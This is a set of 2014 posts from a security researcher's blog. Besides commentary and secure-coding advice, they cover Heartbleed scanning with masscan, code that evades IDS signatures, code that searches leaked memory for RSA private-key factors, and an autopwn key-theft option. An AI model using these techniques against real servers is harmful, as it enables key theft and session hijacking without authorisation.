Wednesday, April 30, 2014

Transparent IPv6 in socket APIs

In the screenshot attached to this post, I'm running my 'heartleech' program against Google's servers. Notice how it's connecting to the servers with IPv6. However, I didn't really do anything special to explicitly support IPv6. The latest Sockets API can transparently support both IPv4 and IPv6, on Win/Mac/Unix, without doing extra work.

The solution starts with the "getaddrinfo()" function, which replaces the older "gethostbyname()". This queries the DNS server, and if the server supports it, returns all the records in response, whether they be A (IPv4) or AAAA (IPv6) records.

By default, Heartleech just chooses the first record in the response, which in this case is IPv6. It next calls the "socket()" function to create a socket. However, instead of choosing the address family explicitly (AF_INET or AF_INET6), it takes the family from the returned address structure. Likewise, when it calls "connect()", it again uses this same structure.

Thus, the code looks like:

    getaddrinfo(hostname, port, 0, &addr);
    fd = socket(addr->ai_family, SOCK_STREAM, 0);
    connect(fd, addr->ai_addr, addr->ai_addrlen);
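
Fleshed out with the error handling the snippet above elides, the pattern looks something like the following. This is a minimal sketch rather than the exact heartleech code: it walks the getaddrinfo() results and connects to the first address that works, whether IPv4 or IPv6.

    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <unistd.h>

    int tcp_connect(const char *hostname, const char *port)
    {
        struct addrinfo hints, *list, *ai;
        int fd = -1;

        memset(&hints, 0, sizeof(hints));
        hints.ai_family = AF_UNSPEC;        /* accept either IPv4 or IPv6 */
        hints.ai_socktype = SOCK_STREAM;

        if (getaddrinfo(hostname, port, &hints, &list) != 0)
            return -1;

        for (ai = list; ai; ai = ai->ai_next) {
            fd = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
            if (fd == -1)
                continue;
            if (connect(fd, ai->ai_addr, ai->ai_addrlen) == 0)
                break;                      /* connected */
            close(fd);
            fd = -1;
        }
        freeaddrinfo(list);
        return fd;
    }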

You can see how this works in the above screenshot. Heartleech calls "getaddrinfo()", and the debug messages list all the IP addresses in the response. It picks whichever comes first and initiates the TCP connection. Sometimes this is IPv4 and sometimes it's IPv6 (as in the above example).

This would work splendidly except for when it comes time to print the address in debug messages. The old IPv4-only functions were "inet_addr()" to parse an address and "inet_ntoa()" to print it. The new functions are "inet_pton()" and "inet_ntop()" respectively. They don't act on the "sockaddr" address structure as the above functions do. Instead, they act on the raw addresses themselves. In other words, I have to call them differently depending upon whether the address is IPv6 or IPv4, which is a bit annoying.
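Concretely, the printing code ends up branching on the address family. A sketch (not the exact heartleech code) of what that branching looks like:

    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    static void print_addr(const struct addrinfo *ai)
    {
        char buf[INET6_ADDRSTRLEN];

        if (ai->ai_family == AF_INET) {
            const struct sockaddr_in *sin = (const struct sockaddr_in *)ai->ai_addr;
            inet_ntop(AF_INET, &sin->sin_addr, buf, sizeof(buf));
        } else if (ai->ai_family == AF_INET6) {
            const struct sockaddr_in6 *sin6 = (const struct sockaddr_in6 *)ai->ai_addr;
            inet_ntop(AF_INET6, &sin6->sin6_addr, buf, sizeof(buf));
        } else {
            return;
        }
        printf("connecting to %s\n", buf);
    }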

A further complication is WinXP. I know you want to ignore it, but it's something we'll have to live with for the next several years. It supports the "getaddrinfo()" function, but not "inet_ntop()". Therefore, I have to wrap that function in the code.
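Something like the following sketch, where my_inet_ntop() is a hypothetical name of my own, not the heartleech code, and the details of old-Windows string formatting are glossed over. Only the trivial IPv4 fallback is shown, since the IPv6 one is longer:

    #include <stdio.h>

    #ifdef _WIN32   /* assume no inet_ntop() on older Windows */
    static const char *my_inet_ntop(int af, const void *src, char *dst, size_t size)
    {
        if (af == AF_INET) {
            const unsigned char *b = (const unsigned char *)src;
            snprintf(dst, size, "%u.%u.%u.%u", b[0], b[1], b[2], b[3]);
            return dst;
        }
        /* ...format the 16 IPv6 bytes by hand... */
        return NULL;
    }
    #else
    #define my_inet_ntop inet_ntop
    #endif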

Finally, sometimes you want to manually select either IPv4 or IPv6, regardless of what getaddrinfo() returns first.
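One way to do that (a minimal sketch, assuming a hypothetical command-line flag has already chosen the family) is through the "hints" argument, which tells getaddrinfo() to return only records of the desired family:

    struct addrinfo hints, *addr;
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_INET6;        /* or AF_INET to force IPv4 */
    hints.ai_socktype = SOCK_STREAM;
    getaddrinfo(hostname, port, &hints, &addr);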

And that's it. If you search the 'heartleech.c' file for AF_INET6, the above list is everything I had to do in order to get IPv6 working. That covers a large amount of non-trivial functionality: the program can go through a Socks5 proxy, negotiate the use of SSL using the STARTTLS protocol, complete the SSL handshake, and then send application-layer commands. All of this works over IPv6 with minimal fuss.


Monday, April 28, 2014

Fun with IDS funtime #3: heartbleed

I don't like the EmergingThreat rules, not so much because of the rules themselves but because of the mentality of the people who use them. I scan the entire Internet. When I get clueless abuse complaints, such as "stop scanning me but I won't tell you my IP address", they usually come from people using the EmergingThreat rules. This encourages me to evade those rules.

The latest example is the Heartbleed attack. Rules that detect the exploit trigger on the pattern |18 03| being the first bytes of TCP packet payload. However, TCP is a streaming protocol: patterns can therefore appear anywhere in the payload, not just the first two bytes.

I therefore changed masscan to push that pattern deeper into the payload, and re-scanned the Internet. Sure enough, not a single user of EmergingThreats complained. The only complaints from IDS users came from IBM sensors with the "TLS_Heartbeat_Short_Request" signature, and from some other unknown IDS with a signature name of "Heartbleed_Scan".
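Mechanically, the evasion is easy because masscan builds its own TCP segments. You can approximate the effect with ordinary sockets by coalescing writes; the following is a hedged sketch (my own function and buffer names, not masscan code) in which a benign record and the heartbeat go out in a single send(), so the kernel typically packs them into one segment and the |18 03| bytes no longer begin the packet payload:

    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>

    /* Sketch: write two pre-built TLS records with one send() so the
       heartbeat's |18 03| header lands mid-payload, not at offset 0. */
    static ssize_t send_evasive(int fd,
                                const unsigned char *benign, size_t benign_len,
                                const unsigned char *heartbeat, size_t hb_len)
    {
        unsigned char buf[4096];
        if (benign_len + hb_len > sizeof(buf))
            return -1;
        memcpy(buf, benign, benign_len);
        memcpy(buf + benign_len, heartbeat, hb_len);
        return send(fd, buf, benign_len + hb_len, 0);
    }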

That the rules can so easily be evaded is an important consideration. Recently, the FBI and ICS-CERT published advisories, recommending IDS signatures to detect exploits of the bug. None of their recommended signatures can detect masscan. I doubt these organizations have the competency to understand why, so I thought I'd explain it in simple terms.

Thursday, April 24, 2014

Clapper muzzles supporters not critics

Recently, the director of national intelligence promulgated a rule barring members of the intelligence community from talking with the press -- even on unclassified matters. This has widely been described as yet another way that they are silencing critics and potential whistleblowers. That may be true, but the intent is the opposite: they want to silence defenders/supporters of the intelligence community.

During the last Winter Olympics, journalists arriving in Sochi reported how basic services like plumbing were broken. A Russian spokesman claimed the journalists were lying, that they had video proof that journalists were leaving the showers running all day long. This led to the natural follow up question: why does Russia have video cameras in showers?

In any crisis, those who would defend you are often your worst enemy. True Believers lie and otherwise behave badly. That's great when the other side does it (e.g. the Glenn Greenwald crowd that distorts the Snowden disclosures), but it hurts you when your own side does it. Thus the first step of crisis management for corporations and governments: make your own supporters shut up.

Am I arguing that James Clapper is therefore not as corrupt as people claim? No, quite the opposite. He's more corrupt.

The intelligence community serves at the whim of the President, who serves at the whim of the people. It's not their job to influence policy, by lobbying Congress or the people. It's their job to carry out policy.

What we see here is that they are trying to control the message -- meaning "influence policy". That's horrible and dangerous, and justifies the worst claims that the Greenwald crowd makes about the intelligence community, that they are looking out for their own interests rather than our interests.

A free and open debate about the intelligence community will harm the interests of the intelligence community. That sucks for them, but screw them. They have no interests but to serve our interests. If we want programs dismantled, and if that allows terrorist attacks, then so be it. It's a choice that we, the informed public, make -- it's not a choice made for us by the intelligence community.

No, Glenn Greenwald did not win a Pulitzer

While the NSA is wrong, its critics are worse. Activists care less about the truth than the NSA.

An example of this is how activists claim Glenn Greenwald is a Pulitzer Prize Winner. He isn't. It's the Guardian newspaper that won the prize, not Greenwald.

The following is my email exchange with the Pulitzer organization, not that truth will convince activists:

Received: from dyn-128-59-99-157.dyn.columbia.edu
 (dyn-128-59-99-157.dyn.columbia.edu [128.59.99.157]) by
 cubmail.cc.columbia.edu (Horde MIME library) with HTTP; Thu, 24 Apr 2014
 10:50:47 -0400
Date: Thu, 24 Apr 2014 10:50:47 -0400
From: <pulitzer@pulitzer.org>
To: Robert Graham 
Subject: Re: Prize for Community Service

Dear Mr. Graham:

Both The Washington Post and The Guardian US were awarded 2014  
Pulitzer Prizes in Public Service. The Public Service prize is always  
awarded to the newspaper and not the individual. Please see our list  
of past Public Service winners here:  
http://www.pulitzer.org/bycat/Public-Service

Sincerely,
Claudia Weissberg
Website Manager
The Pulitzer Prizes

Quoting Robert Graham :

> Hello.
>
> I wholeheartedly agree with your choice for "Community Service", but I
> don't understand it. The prize honors the newspapers, but does that
> mean the journalists like Glenn Greenwald or the leaker Edward Snowden
> can likewise claim credit? In other words, is it accurate to call
> Greenwald a Pulitzer Prize Winner?
>
> Thank you for clearing this up,
> Robert Graham
>
>

Tuesday, April 22, 2014

Heartbleed: Pointer-arithmetic considered harmful

Heartbleed has encouraged people to look at the OpenSSL source code. Many have called it "spaghetti code" -- tangled, fragile, and hard to maintain. While this characterization is accurate, it's unfair. OpenSSL is written according to standard programming practices. It's those practices which are at fault. If you get new engineers to rewrite the code, they'll follow the same practices, and end up with equally tangled code.

Coding practices are out of date, laughably so. If you learn how to program in C in a university today, your textbook and your professor will teach you how to write code as if it were 1984 and not 2014. They will teach you to use "strcpy()", a function prone to buffer-overflows that is widely banned in modern projects. There are fifty other issues with C that are just as important.

In this post, I'm going to focus on one of those out-of-date practices called "pointer-arithmetic". It's a feature essentially unique to C (and its descendant C++). Other languages don't allow it -- for good reason. Pointer-arithmetic leads to unstable, hard-to-maintain code.

In normal languages, if you want to enumerate all the elements in an array, you'd do so with an expression like the following:

     p[i++]

The above code works in a wide variety of programming languages. It works in C, too, and indeed, most languages got it by copying C syntax. However, in C, you may optionally use a different expression:

    *p++

This is pointer-arithmetic. Instead of a fixed pointer and a variable index, the pointer is variable, moving through the array.
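To make the contrast concrete, here is the same copy loop written both ways:

    #include <stddef.h>

    /* Integer-indexed: the pointers stay fixed, only the index moves. */
    void copy_indexed(char *dst, const char *src, size_t n)
    {
        size_t i;
        for (i = 0; i < n; i++)
            dst[i] = src[i];
    }

    /* Pointer-arithmetic: the pointers themselves move through memory. */
    void copy_pointer(char *dst, const char *src, size_t n)
    {
        const char *end = src + n;
        while (src < end)
            *dst++ = *src++;
    }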

To demonstrate how this gets you into trouble, I present the following bit of code from "openssl/ssl/s3_srvr.c":

    {
        s2n(strlen(s->ctx->psk_identity_hint), p);
        strncpy((char *)p, s->ctx->psk_identity_hint, strlen(s->ctx->psk_identity_hint));
        p += strlen(s->ctx->psk_identity_hint);
    }

The first thing to notice is the middle line, the call to "strncpy()". It contains the old programming joke:

    strncpy(dst,src,strlen(src));

The purpose of strncpy() is to guard against buffer-overflows by double-checking the size of the destination. The joke version double-checks the size of the source -- defeating the purpose, causing the same buffer-overflow as if the programmer had just used the original strcpy() in the first place.

This is a funny bit of code, but it turns out it's not stupid. In C, text strings are nul terminated, meaning that a byte with the value of 0 is added to the end of every string. The intent of the code above is to prevent the nul termination, not to prevent buffer-overflows. In other words, the true intent of the programmer can be expressed by changing the above function from "strncpy()" to "memcpy()".
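That is:

    memcpy(p, s->ctx->psk_identity_hint, strlen(s->ctx->psk_identity_hint));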

The reason the programmer wants to avoid nul termination is because they are building a protocol buffer where the string will be prefixed by a length. That's the effect of the macro "s2n()" in the first line of code, which inserts a 2 byte length field and invisibly moves the pointer 'p' forward two bytes. (By the way, macros that invisibly alter variables are likewise bad programming practice.)

The correct fix for the above code is to change from a pointer-arithmetic paradigm to an integer-indexed paradigm. The code would look like the following:

    append_short(p, &offset, max, strlen(s->ctx->psk_identity_hint));
    append_string(p, &offset, max, s->ctx->psk_identity_hint);

The value 'p' remains fixed, we increment the "offset" as we append fields, and we track the maximum size of the buffer with the variable "max". This both untangles the code and makes it inherently safe, preventing buffer-overflows.
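For concreteness, here is a minimal sketch of how such helpers might be implemented. The names append_short() and append_string() are hypothetical, not existing OpenSSL functions; every write is checked against "max", so an overflow becomes impossible by construction:

    #include <stddef.h>
    #include <string.h>

    static void append_short(unsigned char *p, size_t *offset, size_t max,
                             size_t length)
    {
        if (*offset + 2 > max)
            return;                              /* or report an error */
        p[(*offset)++] = (unsigned char)(length >> 8);   /* high byte */
        p[(*offset)++] = (unsigned char)(length & 0xFF); /* low byte */
    }

    static void append_string(unsigned char *p, size_t *offset, size_t max,
                              const char *str)
    {
        size_t len = strlen(str);
        if (len > 0xFFFF || *offset + len > max)
            return;
        memcpy(p + *offset, str, len);           /* no nul terminator, by design */
        *offset += len;
    }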

Last year, college professor John Regehr had a little contest to write a simple function to parse integers. Most solutions to the contest used the pointer-arithmetic approach, only a few (like my solution) used the integer-index paradigm. I urge you to click on those links and compare other solutions to mine.

My solution, using integer indexes

Typical other solution, using pointer-arithmetic


Many justify pointer-arithmetic by claiming it's faster. This isn't really true. In the above contest, my solution was one of the fastest. Indeed, I'm famous for the fact that my code is usually an order of magnitude faster than other people's code. Sure, you can show with some micro-benchmarks that pointer-arithmetic is faster in some cases, but that difference rarely matters. The simplest rule is to never use it -- and if you ever do, write a big comment block explaining why you are doing something so ugly, and include the benchmarks proving it's faster.

Others justify pointer-arithmetic out of language bigotry. We are taught to look down on people who program in one language as if it were another. If you program in C the way you'd program in Java, then (according to this theory) you should just stick with Java. That my snippet of code above works equally well in Java and C is considered a bad thing.

This bigotry is wrong. Yes, when a language gives you desirable constructs, you should use them. But pointer-arithmetic isn't desirable. We use C not because it's a good language, but because it's low-level and the lingua franca of libraries. We can write a library in C for use with Java, but not the reverse. We use C because we have to. We shouldn't be programming in the C paradigm -- we should be adopting the paradigms of other languages. For example, C should be "object oriented", where complex structures have clear constructors, destructors, and accessor member functions. C is hostile to that paradigm of programming -- but it's still the right way to program.


Pointer-arithmetic is just one of many issues affecting the OpenSSL source-base. I point it out here because of the lulz of the strncpy() function. Perhaps in later posts I'll describe some of its other flaws.



Update: Another good style is "functional" programming, where functions avoid "side effects". Again, C is hostile to the idea, but when coders can avoid side-effects, they should.

Friday, April 18, 2014

xkcd is wrong about "free speech"

The usually awesome XKCD cartoon opines that "the right to free speech means only that the government cannot arrest you for what you say". It is profoundly wrong. The cartoon only applies to "First Amendment Rights", where confused people think the government protects their Twitter posts. But it doesn't apply to censorship and other threats against people freely speaking.

The First Amendment doesn't apply to private companies. It says that "Congress shall make no law ... abridging the freedom of speech". This wording is important. It doesn't say that Congress shall pass laws protecting our speech, but that Congress shall not abridge it. "Free speech" is not a right given to us by government. Instead, "free speech" is a right we have, regardless of government.

In other words, if Twitter wants to restrict what you tweet, government can't stop them. If Facebook wants to censor what you post, Congress can't get involved.

But free speech isn't always about government. The forces that want to restrict your speech include private actors. For example, cartoonists around the world draw pictures of Jesus and Buddha, but do not draw pictures of Mohamed, because they are afraid of being murdered by Islamic fundamentalists. South Park depicted Jesus as addicted to Internet porn, and Buddha with a cocaine habit, but the censors forced them to cover up a totally innocuous picture of Mohamed. It's a free-speech issue, but not one that involves government.

In oppressive countries like Russia, the threats to speech rarely come directly from the government. It's not the police arresting people for speech. Instead, it's the local young thugs beating up journalists, with the police looking the other way.

In the United States, society has gone overboard with "political correctness" that silences speech. A good example in the cybersec community is when the "Ada Initiative" got a talk canceled at "BSidesSF" last year, for obscure reasons that come down to the Ada Initiative hating that speech. That sort of thing is very much a "free speech" issue, even though the government wasn't officially involved. Any time those in a position of power restrict speech, purely for its political content, this impinges on our values of "free speech".

The "responsible-disclosure" debate is about "free-speech", where some try to use the hammer of "ethical behavior" to control speech. Last night I tweeted a line of code from the OpenSSL source code that demonstrates a hilariously funny bug. I was attacked for my speech from OpenSSL defenders who want me to quietly submit bug patches rather than making OpenSSL look bad on Twitter.

That's why so many of us oppose the idea of "responsible-disclosure" -- the principle of "free-speech" means "free-disclosure". If you've found a vulnerability, keep it secret, sell it, notify the vendor, notify the press, do whatever the heck you want to do with it. Only "free-disclosure" advances security -- "responsible" disclosure that tries to control the process holds back security.

Such debates do circle back to government. For example, in the Andrew 'weev' Auernheimer case, the government cited Andrew's behavior (notifying the press) as an example of irresponsible behavior, because it didn't fit within the white-hat security norms of "responsible-disclosure". Andrew was sent to jail for speech that embarrassed the powerful -- and it was your anti-free-speech arguments of "responsible-disclosure" that helped put him there.


Certainly, it's technically inaccurate to cite "First Amendment" rights universally, as that's only a restriction on government. But "free speech" is distinct: you can certainly cite your "right to free speech" in cases that have nothing to do with government.


Update: I shoulda just started this post by citing the Wikipedia entry on rights: "Rights are legal, social, or ethical principles of freedom". In other words, it's perfectly valid to use the word "right" in contexts other than "legal".

Update: I mention South Park because the XKCD mentions "when your show gets canceled". If your show gets canceled because nobody watches it, then that's certainly not a free-speech issue. But, when your show gets canceled because of threats from Islamists, then it certainly is a free-speech issue.

Monday, April 14, 2014

Heartbleed: I'm thinking BIGNUM

On Friday night, I started up my 'heartleech' program slurping down data from www.cloudflarechallenge.com at 30-mbps, then went to bed. The next day, I had over 100-gigabytes of data, but I couldn't find the private key. What was the bug in my code that prevented me from finding it? I spent two frustrating days trying to solve that problem.

The answer was "byte-order". I was looking for the prime factor in the form it would appear in a DER-encoded file, which is "big-endian". Instead, the way to find the key is to look for it in little-endian format.

I've misread the OpenSSL code before, but my feeling is that this comes from the "BIGNUM" representation in OpenSSL. An RSA key and its constituent factors are all just integers that are thousands of bits long. Because they don't fit in normal 64-bit integers, they require a special library to manipulate them. The big-endian byte arrays are extracted from the private key file, then converted into the internal representation, at which point you can call functions to add, subtract, multiply, and so on.

The internal representation for OpenSSL is as a series of integers, with low-order integers first. Since the integers on Intel x86 are also little-endian, this means that the internal representation is just byte-swapped from the external form. This would not be the case on something like Solaris SPARC, which has big-endian integers. OpenSSL still stores the array of integers least-significant first, but each integer itself will be big-endian.
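So when hunting a dump for a 1024-bit prime factor of a 2048-bit key, you treat each 128-byte window as a little-endian integer and test whether it divides the public modulus. Here is a minimal sketch of that search using OpenSSL's own BIGNUM routines (not the exact heartleech code, and it assumes those key sizes); byte-swapping each candidate lets the big-endian BN_bin2bn() do the conversion:

    #include <string.h>
    #include <openssl/bn.h>

    /* Returns the offset of a prime factor of n within dump, or -1. */
    long find_prime(const unsigned char *dump, size_t dump_len, const BIGNUM *n)
    {
        unsigned char swapped[128];
        BN_CTX *ctx = BN_CTX_new();
        BIGNUM *p = BN_new(), *rem = BN_new();
        long found = -1;
        size_t i, j;

        for (i = 0; found == -1 && i + sizeof(swapped) <= dump_len; i++) {
            for (j = 0; j < sizeof(swapped); j++)   /* little- to big-endian */
                swapped[j] = dump[i + sizeof(swapped) - 1 - j];
            BN_bin2bn(swapped, sizeof(swapped), p);
            if (BN_is_zero(p) || BN_is_one(p))
                continue;
            BN_mod(rem, n, p, ctx);                 /* does p divide n? */
            if (BN_is_zero(rem))
                found = (long)i;
        }
        BN_free(p);
        BN_free(rem);
        BN_CTX_free(ctx);
        return found;
    }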

My guess is that the reason we can find the prime factors is that there is some BIGNUM memory sitting around that shouldn't be.

What's really annoying is that I started down this BIGNUM path, but then some other people won the www.cloudflarechallenge.com challenge using Python scripts. I therefore assumed that Python used the external big-endian form, so I chose that instead. I then tested my code and successfully found the prime factors when reading from DER-encoded private key files. So I knew my code was correct. But then my code didn't find the prime factors in the data I dumped from CloudFlare. Moreover, I couldn't test their Python scripts, because the files I created from the dumps were 13-gigs in size. Their scripts would first read in the entire file before parsing it -- and would barf at 13-gigs. I have some small 400-meg files -- but none of them contain the key. Sigh.



CloudFlare Challenge writeup

Last week, I made an embarrassing mistake. I misread the OpenSSL code and claimed getting the private-key would be unlikely. This was wrong on so many levels.

Well, today I'm demonstrating the opposite, that anybody can easily get a private-key. Just run my "heartleech" program with the "-a" (autopwn) option against a server, go away from your computer for many hours, and when you come back, you'll have the key.

CloudFlare has been nice enough to put up an unpatched server, challenging people to get its key. This is easy with the autopwn feature of heartleech, as shown in this screenshot.


Friday, April 11, 2014

No, the NSA didn't make us less secure (heartbleed)

According to a Bloomberg story, the NSA has known about the #heartbleed bug from the moment it was written, presumably because they analyze commits to security packages looking for such bugs. Many have opined that this makes us less safe.

It doesn't. The NSA didn't create the hole. They didn't hinder any other researcher from finding it. If the NSA wasn't looking for the bug, the outcome would be the same.

Finding such bugs and keeping them quiet is wholly within the NSA's mission statement. Their job is to spy on foreigners and keep state secrets safe. Generally, state secrets aren't on machines exposed to the Internet, so keeping the bug secret had no impact on that.

Many think the NSA should do a different job than commanded by the President. That's called "treason". That the NSA, CIA, and the military do exactly what they are told is what distinguishes them from other agencies. Former defense secretary Robert Gates pointed that out in his recent memoir: the reason Presidents like Obama love the military and intelligence agencies is that they are the only groups who do what they are told. There are many problems with the NSA, but staying on mission isn't one of them.

Maybe we should have a government agency dedicated to critical cyber infrastructure protection, whose job it would be to find and fix such bugs. Maybe we ought to have a government agency that looks at every commit to the OpenSSL source code, notifying the developers of any problems they find. In theory, the DHS already does that, but of course they are hapless with regards to cybersecurity.

There are reasons to be critical of the NSA. They pay for vulnerabilities, raising the market price of bounties responsible companies like Google have to pay. They hire away talent to look for vulnerabilities, leaving fewer talented people outside the NSA. So in that way, they make everyone else less safe. But the same thing happens elsewhere. After the worms of around 2003, Microsoft hired more than half the talented researchers in the industry, either directly or through consultants, which had the effect of making everyone else less secure. Today, Google and Apple employ lots of talented researchers. The distortions that the NSA causes in the market are smaller than those caused by private enterprise.

The reason to hate the NSA is not because they are following their mission, it's because their mission has crept to include surveilling American citizens. We need to stop making them the bogeyman in every story and focus on the real reasons to hate them.


Weev freed (for now)

The court has overturned the Weev conviction, but on the question of venue, not the vague language of the CFAA. This is actually just as important. I discuss the "Venue Question" in this blog post about the appeal. Orin Kerr has his description here.

If we are lucky, Weev'll get retried in California, where the hack occurred, and we'll get the crazy Judge Kozinski to rule on the vagueness of the CFAA.

Wednesday, April 09, 2014

No, we weren't scanning for heartbleed before April 7

This webpage claims that people were scanning for #heartbleed before the April 7 disclosure of the bug. I doubt it. It was probably just masscan.

The trick with masscan, which makes it different from all other scanners, is that it has a custom TCP/IP stack and a custom SSL stack. When it scans a machine for SSL, it abruptly terminates the connection in the middle of the handshake. This causes no problems, but it's unusual, so servers log it.

The #heartbleed scanners have even less SSL. They just dump raw bytes on the wire and pattern-match the result. They, too, abruptly terminate the connection in the middle of handshaking, causing the same server log messages.

Masscan is really good at doing SSL surveys of the entire Internet, and a lot of people have been using it for that. The tool is only 6 months old, so it's something new in your logs. Two new things producing the same log messages might make them seem correlated, but of course, they aren't.


Why heartbleed doesn't leak the private key [retracted]

I got this completely wrong!

So as it turns out, I completely messed up reading the code. I don't see how, but I read it one way. I can still visualize the code in my mind's eye that I thought I read -- but it's not the real code. I thought it worked one way, but it works another way.

Private keys are still not so likely to be exposed, but still much more likely than my original analysis suggested.

600,000 servers vulnerable to heartbleed

Just an update on "HeartBleed". Yesterday I updated my "masscan" program to scan for it, and last night we scanned the Internet. We found 28,581,134 machines (28-million) that responded with a valid SSL connection. Of those, only 615,268 (600-thousand) were vulnerable to the HeartBleed bug. We also found 330,531 (300-thousand) machines that had heartbeats enabled, but which did not respond to the heartbleed attack. Presumably, this means a third of machines had been patched by the time we ran the scan last night.

Update: Some people have described this as "only 2% vulnerable". That's an unfair way of describing it. We scanned IP addresses. There are millions of IP addresses where port 443 traffic is redirected to a single load balancer. This throws off our counts.

Yes, you might have to change some passwords (#heartbleed)

There is some debate over whether this "HeartBleed" bug means you have to change your password. It might.

The HeartBleed bug grabs some random bits of memory. If a hacker wrote a script that would repeatedly query "login.yahoo.com" a thousand times per second, they'd probably get a hundred usernames/passwords per second.

Usernames and passwords go in HTTP requests just like cookies and URLs. If one is exposed, then so is the other. As I posted yesterday, here is a picture of grabbing part of a session cookie from a real website (Flickr, one of Yahoo's properties):


Luckily, sessions remain open for weeks, while the bug was widely known for only a couple of days. The only passwords you need to change would be ones that you entered in the last couple of days. Personally, I haven't entered any passwords over the last couple of days, so I don't need to change any.

At most, since hackers could have stolen the session cookies, you might want to log out and relogin to sessions on vulnerable servers.



From this article:
"I would change every password everywhere because it's possible something was sniffed out," said Wolfgang Kandek, chief technology officer for Qualys
This is nonsense. If you didn't type in your password over the last few days, then you are likely safe. I've got hundreds of accounts, I'm changing none of them, because I didn't have to relogin over the last few days. I had persistent sessions.

Tuesday, April 08, 2014

Using masscan to scan for heartbleed vulnerability

I've updated my port scanner, "masscan", to specifically look for Neel Mehta's "HeartBleed" vulnerability. Masscan is good for scanning very large networks (like the entire Internet).

Remember that the trick with masscan is that it has its own TCP/IP stack. This means that on Linux and Mac OS X (but not Windows), the operating system will send back RST packets in response to the SYN-ACKs the scanner elicits. Therefore, on Linux, you have to either configure firewall rules to block a range of ports that masscan can use without generating resets, or better yet, just set masscan to "spoof" an otherwise unused IP address on the local network.
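If you go the firewall route, a rule like the following works (a sketch; it assumes you've also pinned masscan to that same source port, e.g. with its --source-port option). It drops inbound packets to that port so the kernel never sees the SYN-ACKs and never sends a RST, while masscan, capturing packets directly, still sees them:

    iptables -A INPUT -p tcp --dport 61000 -j DROP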

Here is how you might use it:

masscan 10.0.0.0/8 -p443 -S 10.1.2.53 --rate 100000 --heartbleed

This translates to:

  • 10.0.0.0/8 = the network you want to scan, which is all 10.x.x.x
  • -p443 = the port(s) you want to scan, in this case, the ones assigned to SSL
  • -S 10.1.2.53 = an otherwise unused local IP address to scan from
  • --rate 100000 = 100,000 packets/second, which scans the entire Class A range in a few minutes
  • --heartbleed = the new option that reconfigures masscan to look for this vulnerability


The output on the command-line will look like the following:

Discovered open port 443/tcp on 10.20.30.143
Banner on port 443/tcp on 10.20.30.143: [ssl] cipher:0xc014
Banner on port 443/tcp on 10.20.30.143: [vuln] SSL[heartbeat] SSL[HEARTBLEED]

There are three pieces of output for each IP address. The first is that the open port exists (the scanner received a SYN-ACK). The second is that SSL exists, that the scanner was able to get back a reasonable SSL result (reporting which cipher suite it's using). The third line is the "vulnerability" information the scanner found. In this case, it's found two separate vulnerabilities. The first is that SSL "heartbeats" are enabled, which really isn't a vulnerability, but something some people might want to remove from their network. The second is the important part, notifying you that the "HEARTBLEED" vulnerability exists (in all caps, 'cause it's important).

Some researchers would like to capture the bled (disclosed) information. To do that, add the option "--capture heartbleed" to the command-line. This will add a fourth line of output per IP address:

Banner on port 443/tcp on 10.20.30.143: [heartbleed] AwJTQ1uQnZtyC7wMvCuSqEiXz705BMwWCoUDkJ93BDPU...

This line will be BASE64 encoded, and be many kilobytes in size (I think masscan truncates it to the first 4k).

What the heartbleed bug looks like on the wire

The "heartbleed" bug appears to grab "uninitialized memory". For typical web servers using OpenSSL, that likely means memory dealing with recent web requests. In the attached screen shot, we ran a test tool against Flickr (which is still vulnerable). Notice that it gives us a person's session cookie (which I've cropped here to avoid harming the innocent). By copying this cookie into a browser ("sidejacking") we can in theory gain temporary access to this person's account.

A picture of the packets sent to test/exploit the HeartBleed bug.
At the bottom, you see part of a person's session cookie.
I think for any particular connection, the chance of getting a "private key" is very low. But of course, if it's only a 1-in-a-million chance, then it's still too high, as attackers can create millions of connections to a server. Also, the impact for a large hosting site like Flickr would be huge, impacting hundreds of millions of connections. In other words, if "risk = likelihood * impact", then the risk of a private-key disclosure is the same as the risk of a cookie disclosure: disclosing the private key affects all hundred million customers with a one-in-a-million likelihood, whereas a session-key disclosure affects only one customer, with a greater than 50% chance per connection.

Tuesday, April 01, 2014

New Service Offering from Errata Security: SATAN-as-A-Service

We have been collecting data on security breaches, vulnerabilities, and attitudes towards security. One conclusion we derived from analyzing this data is that there were far fewer security problems, that we knew of, in 1995 than today. What is so different about today than 1995? One major difference is that SATAN, the controversial security tool by notable cyber cafe attendees Dan Farmer and Wietse Venema, is not as widely used.

We decided to take action:

Today we are announcing Satan-as-A-Service.


SATAN running on a deployable image of Kali Linux:




We are staying faithful to the original vision of SATAN. Our first action will be to finish this TODO list:
TODO list for future (SATAN version 1.1, 2.0, whatever)
----------------------------------------------------------
o       Enable SATAN to fork and run several scans in parallel
o       Talk about sending mail/syslog to each host scanned
o       Look at and deal with subnet masks properly...
o       Put in a DNS walker
o       fix rex client strategy (rex client is currently not being used)
o       get a more complete list of banners from vendors and Internet
       on what is vulnerable and not, for the rules/* files.
o       many more bug tests, etc.
o       Add AFS testing support; currently there is none
o       Add SNMP testing/probing
And most importantly:
o       MAPS!  Big graphical maps that can *show* the relationships
       and are clickable to let users zoom into things, etc...